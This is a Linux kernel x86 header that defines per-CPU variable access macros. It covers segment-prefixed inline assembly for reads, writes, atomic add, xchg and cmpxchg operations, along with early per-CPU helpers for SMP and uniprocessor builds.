/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _ASM_X86_PERCPU_H
#define _ASM_X86_PERCPU_H

/*
 * Per-CPU data is reached through a segment override: GS on 64-bit
 * (with %rip-relative addressing), FS on 32-bit (absolute, so
 * __percpu_rel expands to nothing there).
 */
#ifdef CONFIG_X86_64
# define __percpu_seg		gs
# define __percpu_rel		(%rip)
#else
# define __percpu_seg		fs
# define __percpu_rel
#endif

#ifdef __ASSEMBLER__

/* On UP kernels there is no segment prefix: per-CPU data is plain data. */
#ifdef CONFIG_SMP
# define __percpu		%__percpu_seg:
#else
# define __percpu
#endif

/* Assembler operand referring to the per-CPU variable 'var'. */
#define PER_CPU_VAR(var)	__percpu(var)__percpu_rel

#ifdef CONFIG_X86_64_SMP
# define INIT_PER_CPU_VAR(var)  init_per_cpu__##var
#else
# define INIT_PER_CPU_VAR(var)  var
#endif

#else /* !__ASSEMBLER__: */

#include <linux/build_bug.h>
#include <linux/stringify.h>
#include <asm/asm.h>

#ifdef CONFIG_SMP

#ifdef CONFIG_CC_HAS_NAMED_AS

/* Let sparse model the compiler's named address spaces. */
#ifdef __CHECKER__
# define __seg_gs		__attribute__((address_space(__seg_gs)))
# define __seg_fs		__attribute__((address_space(__seg_fs)))
#endif

#ifdef CONFIG_X86_64
# define __percpu_seg_override	__seg_gs
#else
# define __percpu_seg_override	__seg_fs
#endif

/* With named-AS support the compiler emits the segment prefix itself. */
#define __percpu_prefix		""

#else /* !CONFIG_CC_HAS_NAMED_AS: */

#define __percpu_seg_override
#define __percpu_prefix		"%%"__stringify(__percpu_seg)":"

#endif /* CONFIG_CC_HAS_NAMED_AS */

/* Explicit segment prefix for asm operands, independent of named-AS. */
#define __force_percpu_prefix	"%%"__stringify(__percpu_seg)":"
#define __my_cpu_offset		this_cpu_read(this_cpu_off)

/*
 * Compared to the generic __my_cpu_offset version, the following
 * saves one instruction and avoids clobbering a temp register.
 *
 * arch_raw_cpu_ptr should not be used in 32-bit VDSO for a 64-bit
 * kernel, because games are played with CONFIG_X86_64 there and
 * sizeof(this_cpu_off) becomes 4.
 */
#ifndef BUILD_VDSO32_64
#define arch_raw_cpu_ptr(_ptr)						\
({									\
	unsigned long tcp_ptr__ = raw_cpu_read_long(this_cpu_off);	\
									\
	tcp_ptr__ += (__force unsigned long)(_ptr);			\
	(typeof(*(_ptr)) __kernel __force *)tcp_ptr__;			\
})
#else
#define arch_raw_cpu_ptr(_ptr) ({ BUILD_BUG(); (typeof(_ptr))0; })
#endif

#define PER_CPU_VAR(var)	%__percpu_seg:(var)__percpu_rel

#else /* !CONFIG_SMP: */

/* UP: no segment override needed, per-CPU variables are ordinary data. */
#define __percpu_seg_override
#define __percpu_prefix		""
#define __force_percpu_prefix	""

#define PER_CPU_VAR(var)	(var)__percpu_rel

#endif /* CONFIG_SMP */

/* Access a per-CPU variable through the segment-override address space. */
#define __my_cpu_type(var)	typeof(var) __percpu_seg_override
#define __my_cpu_ptr(ptr)	(__my_cpu_type(*(ptr))*)(__force uintptr_t)(ptr)
#define __my_cpu_var(var)	(*__my_cpu_ptr(&(var)))
/* Asm operand for the named operand 'x', with/without forced seg prefix. */
#define __percpu_arg(x)		__percpu_prefix "%" #x
#define __force_percpu_arg(x)	__force_percpu_prefix "%" #x

/*
 * Initialized pointers to per-CPU variables needed for the boot
 * processor need to use these macros to get the proper address
 * offset from __per_cpu_load on SMP.
 *
 * There also must be an entry in vmlinux_64.lds.S
 */
#define DECLARE_INIT_PER_CPU(var) \
       extern typeof(var) init_per_cpu_var(var)

#ifdef CONFIG_X86_64_SMP
# define init_per_cpu_var(var)  init_per_cpu__##var
#else
# define init_per_cpu_var(var)  var
#endif

/*
 * For arch-specific code, we can use direct single-insn ops (they
 * don't give an lvalue though).
 */

#define __pcpu_type_1		u8
#define __pcpu_type_2		u16
#define __pcpu_type_4		u32
#define __pcpu_type_8		u64

#define __pcpu_cast_1(val)	((u8)(((unsigned long) val) & 0xff))
#define __pcpu_cast_2(val)	((u16)(((unsigned long) val) & 0xffff))
#define __pcpu_cast_4(val)	((u32)(((unsigned long) val) & 0xffffffff))
#define __pcpu_cast_8(val)	((u64)(val))

#define __pcpu_op1_1(op, dst)	op "b " dst
#define __pcpu_op1_2(op, dst)	op "w " dst
#define __pcpu_op1_4(op, dst)	op "l " dst
#define __pcpu_op1_8(op, dst)	op "q " dst

#define __pcpu_op2_1(op, src, dst) op "b " src ", " dst
#define __pcpu_op2_2(op, src, dst) op "w " src ", " dst
#define __pcpu_op2_4(op, src, dst) op "l " src ", " dst
#define __pcpu_op2_8(op, src, dst) op "q " src ", " dst

#define __pcpu_reg_1(mod, x)	mod "q" (x)
#define __pcpu_reg_2(mod, x)	mod "r" (x)
#define __pcpu_reg_4(mod, x)	mod "r" (x)
#define __pcpu_reg_8(mod, x)	mod "r" (x)

#define __pcpu_reg_imm_1(x)	"qi" (x)
#define __pcpu_reg_imm_2(x)	"ri" (x)
#define __pcpu_reg_imm_4(x)	"ri" (x)
#define __pcpu_reg_imm_8(x)	"re" (x)

#ifdef CONFIG_USE_X86_SEG_SUPPORT

#define __raw_cpu_read(size, qual, pcp)					\
({									\
	*(qual __my_cpu_type(pcp) *)__my_cpu_ptr(&(pcp));		\
})

#define __raw_cpu_write(size, qual, pcp, val)				\
do {									\
	*(qual __my_cpu_type(pcp) *)__my_cpu_ptr(&(pcp)) = (val);	\
} while (0)

#define __raw_cpu_read_const(pcp)	__raw_cpu_read(, , pcp)

#else /* !CONFIG_USE_X86_SEG_SUPPORT: */

#define __raw_cpu_read(size, qual, _var)				\
({									\
	__pcpu_type_##size pfo_val__;					\
									\
	asm qual (__pcpu_op2_##size("mov", __percpu_arg([var]), "%[val]") \
	    : [val] __pcpu_reg_##size("=", pfo_val__)			\
	    : [var] "m" (__my_cpu_var(_var)));				\
									\
	(typeof(_var))(unsigned long) pfo_val__;			\
})

#define __raw_cpu_write(size, qual, _var, _val)				\
do {									\
	__pcpu_type_##size pto_val__ = __pcpu_cast_##size(_val);	\
									\
	if (0) {		                                        \
		typeof(_var) pto_tmp__;					\
		pto_tmp__ = (_val);					\
		(void)pto_tmp__;					\
	}								\
	asm qual(__pcpu_op2_##size("mov", "%[val]", __percpu_arg([var])) \
	    : [var] "=m" (__my_cpu_var(_var))				\
	    : [val] __pcpu_reg_imm_##size(pto_val__));			\
} while (0)

/*
 * The generic per-CPU infrastrucutre is not suitable for
 * reading const-qualified variables.
 */
#define __raw_cpu_read_const(pcp)	({ BUILD_BUG(); (typeof(pcp))0; })

#endif /* CONFIG_USE_X86_SEG_SUPPORT */

/*
 * "Stable" read: the address is passed as an "i" (immediate) operand and
 * printed via %a, so there is no "m" input forcing a reload -- the
 * compiler may cache/CSE the result (see this_cpu_read_stable() below).
 */
#define __raw_cpu_read_stable(size, _var)				\
({									\
	__pcpu_type_##size pfo_val__;					\
									\
	asm(__pcpu_op2_##size("mov", __force_percpu_arg(a[var]), "%[val]") \
	    : [val] __pcpu_reg_##size("=", pfo_val__)			\
	    : [var] "i" (&(_var)));					\
									\
	(typeof(_var))(unsigned long) pfo_val__;			\
})

/* Single read-modify-write instruction on a per-CPU variable (inc/dec/...). */
#define percpu_unary_op(size, qual, op, _var)				\
({									\
	asm qual (__pcpu_op1_##size(op, __percpu_arg([var]))		\
	    : [var] "+m" (__my_cpu_var(_var)));				\
})

/*
 * Two-operand RMW instruction (add/and/or/...); the dead "if (0)" block
 * only type-checks _val against _var at build time.
 */
#define percpu_binary_op(size, qual, op, _var, _val)			\
do {									\
	__pcpu_type_##size pto_val__ = __pcpu_cast_##size(_val);	\
									\
	if (0) {		                                        \
		typeof(_var) pto_tmp__;					\
		pto_tmp__ = (_val);					\
		(void)pto_tmp__;					\
	}								\
	asm qual(__pcpu_op2_##size(op, "%[val]", __percpu_arg([var]))	\
	    : [var] "+m" (__my_cpu_var(_var))				\
	    : [val] __pcpu_reg_imm_##size(pto_val__));			\
} while (0)

/*
 * Generate a per-CPU add to memory instruction and optimize code
 * if one is added or subtracted.
 */
/* pao_ID__ is 1 for constant +1, -1 for constant -1, 0 otherwise. */
#define percpu_add_op(size, qual, var, val)				\
do {									\
	const int pao_ID__ =						\
		(__builtin_constant_p(val) &&				\
			((val) == 1 ||					\
			 (val) == (typeof(val))-1)) ? (int)(val) : 0;	\
									\
	if (0) {							\
		typeof(var) pao_tmp__;					\
		pao_tmp__ = (val);					\
		(void)pao_tmp__;					\
	}								\
	if (pao_ID__ == 1)						\
		percpu_unary_op(size, qual, "inc", var);		\
	else if (pao_ID__ == -1)					\
		percpu_unary_op(size, qual, "dec", var);		\
	else								\
		percpu_binary_op(size, qual, "add", var, val);		\
} while (0)

/*
 * Add return operation
 */
/* XADD leaves the previous value in the register; result is old + _val. */
#define percpu_add_return_op(size, qual, _var, _val)			\
({									\
	__pcpu_type_##size paro_tmp__ = __pcpu_cast_##size(_val);	\
									\
	asm qual (__pcpu_op2_##size("xadd", "%[tmp]",			\
				     __percpu_arg([var]))		\
		  : [tmp] __pcpu_reg_##size("+", paro_tmp__),		\
		    [var] "+m" (__my_cpu_var(_var))			\
		  : : "memory");					\
	(typeof(_var))(unsigned long) (paro_tmp__ + _val);		\
})

/*
 * raw_cpu_xchg() can use a load-store since
 * it is not required to be IRQ-safe.
 */
#define raw_percpu_xchg_op(_var, _nval)					\
({									\
	typeof(_var) pxo_old__ = raw_cpu_read(_var);			\
									\
	raw_cpu_write(_var, _nval);					\
									\
	pxo_old__;							\
})

/*
 * this_cpu_xchg() is implemented using CMPXCHG without a LOCK prefix.
 * XCHG is expensive due to the implied LOCK prefix. The processor
 * cannot prefetch cachelines if XCHG is used.
 */
#define this_percpu_xchg_op(_var, _nval)				\
({									\
	typeof(_var) pxo_old__ = this_cpu_read(_var);			\
									\
	do { } while (!this_cpu_try_cmpxchg(_var, &pxo_old__, _nval));	\
									\
	pxo_old__;							\
})

/*
 * CMPXCHG has no such implied lock semantics as a result it is much
 * more efficient for CPU-local operations.
 */
#define percpu_cmpxchg_op(size, qual, _var, _oval, _nval)		\
({									\
	__pcpu_type_##size pco_old__ = __pcpu_cast_##size(_oval);	\
	__pcpu_type_##size pco_new__ = __pcpu_cast_##size(_nval);	\
									\
	asm qual (__pcpu_op2_##size("cmpxchg", "%[nval]",		\
				    __percpu_arg([var]))		\
		  : [oval] "+a" (pco_old__),				\
		    [var] "+m" (__my_cpu_var(_var))			\
		  : [nval] __pcpu_reg_##size(, pco_new__)		\
		  : "memory");						\
									\
	(typeof(_var))(unsigned long) pco_old__;			\
})

#define percpu_try_cmpxchg_op(size, qual, _var, _ovalp, _nval)		\
({									\
	bool success;							\
	__pcpu_type_##size *pco_oval__ = (__pcpu_type_##size *)(_ovalp); \
	__pcpu_type_##size pco_old__ = *pco_oval__;			\
	__pcpu_type_##size pco_new__ = __pcpu_cast_##size(_nval);	\
									\
	asm qual (__pcpu_op2_##size("cmpxchg", "%[nval]",		\
				    __percpu_arg([var]))		\
		  CC_SET(z)						\
		  : CC_OUT(z) (success),				\
		    [oval] "+a" (pco_old__),				\
		    [var] "+m" (__my_cpu_var(_var))			\
		  : [nval] __pcpu_reg_##size(, pco_new__)		\
		  : "memory");						\
	if (unlikely(!success))						\
		*pco_oval__ = pco_old__;				\
									\
	likely(success);						\
})

#if defined(CONFIG_X86_32) && !defined(CONFIG_UML)

/*
 * 32-bit 8-byte cmpxchg: uses CMPXCHG8B (old in EDX:EAX, new in ECX:EBX)
 * when X86_FEATURE_CX8 is present, otherwise falls back to the
 * this_cpu_cmpxchg8b_emu call; "S" passes the variable's plain address
 * for that emulation path. Returns the previous value.
 */
#define percpu_cmpxchg64_op(size, qual, _var, _oval, _nval)		\
({									\
	union {								\
		u64 var;						\
		struct {						\
			u32 low, high;					\
		};							\
	} old__, new__;							\
									\
	old__.var = _oval;						\
	new__.var = _nval;						\
									\
	asm qual (ALTERNATIVE("call this_cpu_cmpxchg8b_emu",		\
			      "cmpxchg8b " __percpu_arg([var]), X86_FEATURE_CX8) \
		  : ALT_OUTPUT_SP([var] "+m" (__my_cpu_var(_var)),	\
				  "+a" (old__.low),			\
				  "+d" (old__.high))			\
		  : "b" (new__.low),					\
		    "c" (new__.high),					\
		    "S" (&(_var))					\
		  : "memory");						\
									\
	old__.var;							\
})

#define raw_cpu_cmpxchg64(pcp, oval, nval)		percpu_cmpxchg64_op(8,         , pcp, oval, nval)
#define this_cpu_cmpxchg64(pcp, oval, nval)		percpu_cmpxchg64_op(8, volatile, pcp, oval, nval)

/*
 * try flavour: true on success; on failure the observed value is
 * written back through _ovalp.
 */
#define percpu_try_cmpxchg64_op(size, qual, _var, _ovalp, _nval)	\
({									\
	bool success;							\
	u64 *_oval = (u64 *)(_ovalp);					\
	union {								\
		u64 var;						\
		struct {						\
			u32 low, high;					\
		};							\
	} old__, new__;							\
									\
	old__.var = *_oval;						\
	new__.var = _nval;						\
									\
	asm qual (ALTERNATIVE("call this_cpu_cmpxchg8b_emu",		\
			      "cmpxchg8b " __percpu_arg([var]), X86_FEATURE_CX8) \
		  CC_SET(z)						\
		  : ALT_OUTPUT_SP(CC_OUT(z) (success),			\
				  [var] "+m" (__my_cpu_var(_var)),	\
				  "+a" (old__.low),			\
				  "+d" (old__.high))			\
		  : "b" (new__.low),					\
		    "c" (new__.high),					\
		    "S" (&(_var))					\
		  : "memory");						\
	if (unlikely(!success))						\
		*_oval = old__.var;					\
									\
	likely(success);						\
})

#define raw_cpu_try_cmpxchg64(pcp, ovalp, nval)		percpu_try_cmpxchg64_op(8,         , pcp, ovalp, nval)
#define this_cpu_try_cmpxchg64(pcp, ovalp, nval)	percpu_try_cmpxchg64_op(8, volatile, pcp, ovalp, nval)

#endif /* defined(CONFIG_X86_32) && !defined(CONFIG_UML) */

#ifdef CONFIG_X86_64
/*
 * 64-bit kernels have native 8-byte CMPXCHG, so the cmpxchg64 wrappers
 * map directly onto the generic sized operations.
 *
 * No trailing semicolons here: these expand to statement expressions
 * and must stay usable as rvalues, e.g. "old = raw_cpu_cmpxchg64(...)"
 * or as a function argument -- a stray ';' in the expansion would break
 * such uses.
 */
#define raw_cpu_cmpxchg64(pcp, oval, nval)		percpu_cmpxchg_op(8,         , pcp, oval, nval)
#define this_cpu_cmpxchg64(pcp, oval, nval)		percpu_cmpxchg_op(8, volatile, pcp, oval, nval)

#define raw_cpu_try_cmpxchg64(pcp, ovalp, nval)		percpu_try_cmpxchg_op(8,         , pcp, ovalp, nval)
#define this_cpu_try_cmpxchg64(pcp, ovalp, nval)	percpu_try_cmpxchg_op(8, volatile, pcp, ovalp, nval)

/*
 * 128-bit cmpxchg: CMPXCHG16B (old in RDX:RAX, new in RCX:RBX) when
 * X86_FEATURE_CX16 is present, otherwise the this_cpu_cmpxchg16b_emu
 * call; "S" passes the variable's plain address for the emulation path.
 * Returns the previous value.
 */
#define percpu_cmpxchg128_op(size, qual, _var, _oval, _nval)		\
({									\
	union {								\
		u128 var;						\
		struct {						\
			u64 low, high;					\
		};							\
	} old__, new__;							\
									\
	old__.var = _oval;						\
	new__.var = _nval;						\
									\
	asm qual (ALTERNATIVE("call this_cpu_cmpxchg16b_emu",		\
			      "cmpxchg16b " __percpu_arg([var]), X86_FEATURE_CX16) \
		  : ALT_OUTPUT_SP([var] "+m" (__my_cpu_var(_var)),	\
				  "+a" (old__.low),			\
				  "+d" (old__.high))			\
		  : "b" (new__.low),					\
		    "c" (new__.high),					\
		    "S" (&(_var))					\
		  : "memory");						\
									\
	old__.var;							\
})

#define raw_cpu_cmpxchg128(pcp, oval, nval)		percpu_cmpxchg128_op(16,         , pcp, oval, nval)
#define this_cpu_cmpxchg128(pcp, oval, nval)		percpu_cmpxchg128_op(16, volatile, pcp, oval, nval)

/*
 * try flavour: true on success; on failure the observed value is
 * written back through _ovalp.
 */
#define percpu_try_cmpxchg128_op(size, qual, _var, _ovalp, _nval)	\
({									\
	bool success;							\
	u128 *_oval = (u128 *)(_ovalp);					\
	union {								\
		u128 var;						\
		struct {						\
			u64 low, high;					\
		};							\
	} old__, new__;							\
									\
	old__.var = *_oval;						\
	new__.var = _nval;						\
									\
	asm qual (ALTERNATIVE("call this_cpu_cmpxchg16b_emu",		\
			      "cmpxchg16b " __percpu_arg([var]), X86_FEATURE_CX16) \
		  CC_SET(z)						\
		  : ALT_OUTPUT_SP(CC_OUT(z) (success),			\
				  [var] "+m" (__my_cpu_var(_var)),	\
				  "+a" (old__.low),			\
				  "+d" (old__.high))			\
		  : "b" (new__.low),					\
		    "c" (new__.high),					\
		    "S" (&(_var))					\
		  : "memory");						\
	if (unlikely(!success))						\
		*_oval = old__.var;					\
	likely(success);						\
})

#define raw_cpu_try_cmpxchg128(pcp, ovalp, nval)	percpu_try_cmpxchg128_op(16,         , pcp, ovalp, nval)
#define this_cpu_try_cmpxchg128(pcp, ovalp, nval)	percpu_try_cmpxchg128_op(16, volatile, pcp, ovalp, nval)

#endif /* CONFIG_X86_64 */

/* 1/2/4-byte raw_cpu_* operations (no volatile: may be reordered/cached). */
#define raw_cpu_read_1(pcp)				__raw_cpu_read(1, , pcp)
#define raw_cpu_read_2(pcp)				__raw_cpu_read(2, , pcp)
#define raw_cpu_read_4(pcp)				__raw_cpu_read(4, , pcp)
#define raw_cpu_write_1(pcp, val)			__raw_cpu_write(1, , pcp, val)
#define raw_cpu_write_2(pcp, val)			__raw_cpu_write(2, , pcp, val)
#define raw_cpu_write_4(pcp, val)			__raw_cpu_write(4, , pcp, val)

/* 1/2/4-byte this_cpu_* operations (volatile asm: performed every time). */
#define this_cpu_read_1(pcp)				__raw_cpu_read(1, volatile, pcp)
#define this_cpu_read_2(pcp)				__raw_cpu_read(2, volatile, pcp)
#define this_cpu_read_4(pcp)				__raw_cpu_read(4, volatile, pcp)
#define this_cpu_write_1(pcp, val)			__raw_cpu_write(1, volatile, pcp, val)
#define this_cpu_write_2(pcp, val)			__raw_cpu_write(2, volatile, pcp, val)
#define this_cpu_write_4(pcp, val)			__raw_cpu_write(4, volatile, pcp, val)

#define this_cpu_read_stable_1(pcp)			__raw_cpu_read_stable(1, pcp)
#define this_cpu_read_stable_2(pcp)			__raw_cpu_read_stable(2, pcp)
#define this_cpu_read_stable_4(pcp)			__raw_cpu_read_stable(4, pcp)

#define raw_cpu_add_1(pcp, val)				percpu_add_op(1, , (pcp), val)
#define raw_cpu_add_2(pcp, val)				percpu_add_op(2, , (pcp), val)
#define raw_cpu_add_4(pcp, val)				percpu_add_op(4, , (pcp), val)
#define raw_cpu_and_1(pcp, val)				percpu_binary_op(1, , "and", (pcp), val)
#define raw_cpu_and_2(pcp, val)				percpu_binary_op(2, , "and", (pcp), val)
#define raw_cpu_and_4(pcp, val)				percpu_binary_op(4, , "and", (pcp), val)
#define raw_cpu_or_1(pcp, val)				percpu_binary_op(1, , "or", (pcp), val)
#define raw_cpu_or_2(pcp, val)				percpu_binary_op(2, , "or", (pcp), val)
#define raw_cpu_or_4(pcp, val)				percpu_binary_op(4, , "or", (pcp), val)
#define raw_cpu_xchg_1(pcp, val)			raw_percpu_xchg_op(pcp, val)
#define raw_cpu_xchg_2(pcp, val)			raw_percpu_xchg_op(pcp, val)
#define raw_cpu_xchg_4(pcp, val)			raw_percpu_xchg_op(pcp, val)

#define this_cpu_add_1(pcp, val)			percpu_add_op(1, volatile, (pcp), val)
#define this_cpu_add_2(pcp, val)			percpu_add_op(2, volatile, (pcp), val)
#define this_cpu_add_4(pcp, val)			percpu_add_op(4, volatile, (pcp), val)
#define this_cpu_and_1(pcp, val)			percpu_binary_op(1, volatile, "and", (pcp), val)
#define this_cpu_and_2(pcp, val)			percpu_binary_op(2, volatile, "and", (pcp), val)
#define this_cpu_and_4(pcp, val)			percpu_binary_op(4, volatile, "and", (pcp), val)
#define this_cpu_or_1(pcp, val)				percpu_binary_op(1, volatile, "or", (pcp), val)
#define this_cpu_or_2(pcp, val)				percpu_binary_op(2, volatile, "or", (pcp), val)
#define this_cpu_or_4(pcp, val)				percpu_binary_op(4, volatile, "or", (pcp), val)
#define this_cpu_xchg_1(pcp, nval)			this_percpu_xchg_op(pcp, nval)
#define this_cpu_xchg_2(pcp, nval)			this_percpu_xchg_op(pcp, nval)
#define this_cpu_xchg_4(pcp, nval)			this_percpu_xchg_op(pcp, nval)

#define raw_cpu_add_return_1(pcp, val)			percpu_add_return_op(1, , pcp, val)
#define raw_cpu_add_return_2(pcp, val)			percpu_add_return_op(2, , pcp, val)
#define raw_cpu_add_return_4(pcp, val)			percpu_add_return_op(4, , pcp, val)
#define raw_cpu_cmpxchg_1(pcp, oval, nval)		percpu_cmpxchg_op(1, , pcp, oval, nval)
#define raw_cpu_cmpxchg_2(pcp, oval, nval)		percpu_cmpxchg_op(2, , pcp, oval, nval)
#define raw_cpu_cmpxchg_4(pcp, oval, nval)		percpu_cmpxchg_op(4, , pcp, oval, nval)
#define raw_cpu_try_cmpxchg_1(pcp, ovalp, nval)		percpu_try_cmpxchg_op(1, , pcp, ovalp, nval)
#define raw_cpu_try_cmpxchg_2(pcp, ovalp, nval)		percpu_try_cmpxchg_op(2, , pcp, ovalp, nval)
#define raw_cpu_try_cmpxchg_4(pcp, ovalp, nval)		percpu_try_cmpxchg_op(4, , pcp, ovalp, nval)

#define this_cpu_add_return_1(pcp, val)			percpu_add_return_op(1, volatile, pcp, val)
#define this_cpu_add_return_2(pcp, val)			percpu_add_return_op(2, volatile, pcp, val)
#define this_cpu_add_return_4(pcp, val)			percpu_add_return_op(4, volatile, pcp, val)
#define this_cpu_cmpxchg_1(pcp, oval, nval)		percpu_cmpxchg_op(1, volatile, pcp, oval, nval)
#define this_cpu_cmpxchg_2(pcp, oval, nval)		percpu_cmpxchg_op(2, volatile, pcp, oval, nval)
#define this_cpu_cmpxchg_4(pcp, oval, nval)		percpu_cmpxchg_op(4, volatile, pcp, oval, nval)
#define this_cpu_try_cmpxchg_1(pcp, ovalp, nval)	percpu_try_cmpxchg_op(1, volatile, pcp, ovalp, nval)
#define this_cpu_try_cmpxchg_2(pcp, ovalp, nval)	percpu_try_cmpxchg_op(2, volatile, pcp, ovalp, nval)
#define this_cpu_try_cmpxchg_4(pcp, ovalp, nval)	percpu_try_cmpxchg_op(4, volatile, pcp, ovalp, nval)

/*
 * Per-CPU atomic 64-bit operations are only available under 64-bit kernels.
 * 32-bit kernels must fall back to generic operations.
 */
#ifdef CONFIG_X86_64

#define raw_cpu_read_8(pcp)				__raw_cpu_read(8, , pcp)
#define raw_cpu_write_8(pcp, val)			__raw_cpu_write(8, , pcp, val)

#define this_cpu_read_8(pcp)				__raw_cpu_read(8, volatile, pcp)
#define this_cpu_write_8(pcp, val)			__raw_cpu_write(8, volatile, pcp, val)

#define this_cpu_read_stable_8(pcp)			__raw_cpu_read_stable(8, pcp)

#define raw_cpu_add_8(pcp, val)				percpu_add_op(8, , (pcp), val)
#define raw_cpu_and_8(pcp, val)				percpu_binary_op(8, , "and", (pcp), val)
#define raw_cpu_or_8(pcp, val)				percpu_binary_op(8, , "or", (pcp), val)
#define raw_cpu_add_return_8(pcp, val)			percpu_add_return_op(8, , pcp, val)
#define raw_cpu_xchg_8(pcp, nval)			raw_percpu_xchg_op(pcp, nval)
#define raw_cpu_cmpxchg_8(pcp, oval, nval)		percpu_cmpxchg_op(8, , pcp, oval, nval)
#define raw_cpu_try_cmpxchg_8(pcp, ovalp, nval)		percpu_try_cmpxchg_op(8, , pcp, ovalp, nval)

#define this_cpu_add_8(pcp, val)			percpu_add_op(8, volatile, (pcp), val)
#define this_cpu_and_8(pcp, val)			percpu_binary_op(8, volatile, "and", (pcp), val)
#define this_cpu_or_8(pcp, val)				percpu_binary_op(8, volatile, "or", (pcp), val)
#define this_cpu_add_return_8(pcp, val)			percpu_add_return_op(8, volatile, pcp, val)
#define this_cpu_xchg_8(pcp, nval)			this_percpu_xchg_op(pcp, nval)
#define this_cpu_cmpxchg_8(pcp, oval, nval)		percpu_cmpxchg_op(8, volatile, pcp, oval, nval)
#define this_cpu_try_cmpxchg_8(pcp, ovalp, nval)	percpu_try_cmpxchg_op(8, volatile, pcp, ovalp, nval)

#define raw_cpu_read_long(pcp)				raw_cpu_read_8(pcp)

#else /* !CONFIG_X86_64: */

/* There is no generic 64-bit read stable operation for 32-bit targets. */
#define this_cpu_read_stable_8(pcp)			({ BUILD_BUG(); (typeof(pcp))0; })

#define raw_cpu_read_long(pcp)				raw_cpu_read_4(pcp)

#endif /* CONFIG_X86_64 */

#define this_cpu_read_const(pcp)			__raw_cpu_read_const(pcp)

/*
 * this_cpu_read() makes the compiler load the per-CPU variable every time
 * it is accessed while this_cpu_read_stable() allows the value to be cached.
 * this_cpu_read_stable() is more efficient and can be used if its value
 * is guaranteed to be valid across CPUs.  The current users include
 * pcpu_hot.current_task and pcpu_hot.top_of_stack, both of which are
 * actually per-thread variables implemented as per-CPU variables and
 * thus stable for the duration of the respective task.
 */
#define this_cpu_read_stable(pcp)			__pcpu_size_call_return(this_cpu_read_stable_, pcp)

#define x86_this_cpu_constant_test_bit(_nr, _var)			\
({									\
	unsigned long __percpu *addr__ =				\
		(unsigned long __percpu *)&(_var) + ((_nr) / BITS_PER_LONG); \
									\
	!!((1UL << ((_nr) % BITS_PER_LONG)) & raw_cpu_read(*addr__));	\
})

#define x86_this_cpu_variable_test_bit(_nr, _var)			\
({									\
	bool oldbit;							\
									\
	asm volatile("btl %[nr], " __percpu_arg([var])			\
		     CC_SET(c)						\
		     : CC_OUT(c) (oldbit)				\
		     : [var] "m" (__my_cpu_var(_var)),			\
		       [nr] "rI" (_nr));				\
	oldbit;								\
})

#define x86_this_cpu_test_bit(_nr, _var)				\
	(__builtin_constant_p(_nr)					\
	 ? x86_this_cpu_constant_test_bit(_nr, _var)			\
	 : x86_this_cpu_variable_test_bit(_nr, _var))


#include <asm-generic/percpu.h>

/* We can use this directly for local CPU (faster). */
DECLARE_PER_CPU_READ_MOSTLY(unsigned long, this_cpu_off);

#endif /* !__ASSEMBLER__ */

#ifdef CONFIG_SMP

/*
 * Define the "EARLY_PER_CPU" macros.  These are used for some per_cpu
 * variables that are initialized and accessed before there are per_cpu
 * areas allocated.
 */

/*
 * Each early variable gets a companion __initdata array and a pointer
 * to it; the pointer is cleared once the real per-CPU areas exist.
 */
#define	DEFINE_EARLY_PER_CPU(_type, _name, _initvalue)			\
	DEFINE_PER_CPU(_type, _name) = _initvalue;			\
	__typeof__(_type) _name##_early_map[NR_CPUS] __initdata =	\
				{ [0 ... NR_CPUS-1] = _initvalue };	\
	__typeof__(_type) *_name##_early_ptr __refdata = _name##_early_map

#define DEFINE_EARLY_PER_CPU_READ_MOSTLY(_type, _name, _initvalue)	\
	DEFINE_PER_CPU_READ_MOSTLY(_type, _name) = _initvalue;		\
	__typeof__(_type) _name##_early_map[NR_CPUS] __initdata =	\
				{ [0 ... NR_CPUS-1] = _initvalue };	\
	__typeof__(_type) *_name##_early_ptr __refdata = _name##_early_map

#define EXPORT_EARLY_PER_CPU_SYMBOL(_name)				\
	EXPORT_PER_CPU_SYMBOL(_name)

#define DECLARE_EARLY_PER_CPU(_type, _name)				\
	DECLARE_PER_CPU(_type, _name);					\
	extern __typeof__(_type) *_name##_early_ptr;			\
	extern __typeof__(_type)  _name##_early_map[]

#define DECLARE_EARLY_PER_CPU_READ_MOSTLY(_type, _name)			\
	DECLARE_PER_CPU_READ_MOSTLY(_type, _name);			\
	extern __typeof__(_type) *_name##_early_ptr;			\
	extern __typeof__(_type)  _name##_early_map[]

#define	early_per_cpu_ptr(_name)			(_name##_early_ptr)
#define	early_per_cpu_map(_name, _idx)			(_name##_early_map[_idx])

/* Use the early map while it is still live, the real per-CPU area after. */
#define	early_per_cpu(_name, _cpu)					\
	*(early_per_cpu_ptr(_name) ?					\
		&early_per_cpu_ptr(_name)[_cpu] :			\
		&per_cpu(_name, _cpu))

#else /* !CONFIG_SMP: */

/* UP: "early" accessors degenerate to the plain per_cpu definitions. */
#define	DEFINE_EARLY_PER_CPU(_type, _name, _initvalue)			\
	DEFINE_PER_CPU(_type, _name) = _initvalue

#define DEFINE_EARLY_PER_CPU_READ_MOSTLY(_type, _name, _initvalue)	\
	DEFINE_PER_CPU_READ_MOSTLY(_type, _name) = _initvalue

#define EXPORT_EARLY_PER_CPU_SYMBOL(_name)				\
	EXPORT_PER_CPU_SYMBOL(_name)

#define DECLARE_EARLY_PER_CPU(_type, _name)				\
	DECLARE_PER_CPU(_type, _name)

#define DECLARE_EARLY_PER_CPU_READ_MOSTLY(_type, _name)			\
	DECLARE_PER_CPU_READ_MOSTLY(_type, _name)

#define	early_per_cpu(_name, _cpu)			per_cpu(_name, _cpu)
#define	early_per_cpu_ptr(_name)			NULL
/* no early_per_cpu_map() */

#endif /* !CONFIG_SMP */
